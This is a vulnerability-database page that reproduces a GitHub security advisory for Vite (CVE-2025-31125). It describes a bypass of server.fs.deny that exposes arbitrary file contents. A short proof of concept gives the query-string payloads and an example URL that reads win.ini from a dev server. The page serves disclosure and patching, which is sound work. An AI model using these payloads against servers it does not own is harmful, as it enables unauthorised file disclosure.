Loading HuntDB...
Hunt
Vulnerability Intelligence by wss.sh
Home Daily Briefings High Impact CVEs Recent Exploits KEV Catalog GitHub Advisories Latest Updates Security News
Sign In Sign Up

GHSA-4r4m-qw57-chr8

GitHub Security Advisory

Vite has a `server.fs.deny` bypassed for `inline` and `raw` with `?import` query

✓ GitHub Reviewed MODERATE Has CVE
View on GitHub

Advisory Details

### Summary

The contents of arbitrary files can be returned to the browser.

### Impact
Only apps explicitly exposing the Vite dev server to the network (using `--host` or [`server.host` config option](https://vitejs.dev/config/server-options.html#server-host)) are affected.

### Details

- base64 encoded content of non-allowed files is exposed using `?inline&import` (originally reported as `?import&?inline=1.wasm?init`)
- content of non-allowed files is exposed using `?raw?import`

`/@fs/` isn't needed to reproduce the issue for files inside the project root.

### PoC

Original report (check details above for simplified cases):

The ?import&?inline=1.wasm?init ending allows attackers to read arbitrary files and returns the file content if it exists. Base64 decoding needs to be performed twice
```
$ npm create vite@latest
$ cd vite-project/
$ npm install
$ npm run dev
```

Example full URL `http://localhost:5173/@fs/C:/windows/win.ini?import&?inline=1.wasm?init`

Affected Packages

npm vite
Affected versions: 6.2.0 (fixed in 6.2.4)
npm vite
Affected versions: 6.1.0 (fixed in 6.1.3)
npm vite
Affected versions: 6.0.0 (fixed in 6.0.13)
npm vite
Affected versions: 5.0.0 (fixed in 5.4.16)
npm vite
Affected versions: 0 (fixed in 4.5.11)

Related CVEs

CVE-2025-31125

Key Information

GHSA ID
GHSA-4r4m-qw57-chr8
Published
March 31, 2025 5:31 PM
Last Modified
March 31, 2025 11:32 PM
CVSS Score
5.0 /10
Primary Ecosystem
npm
Primary Package
vite
GitHub Reviewed
✓ Yes

Dataset

Last updated: September 13, 2025 6:30 AM

Data from GitHub Advisory Database. This information is provided for research and educational purposes.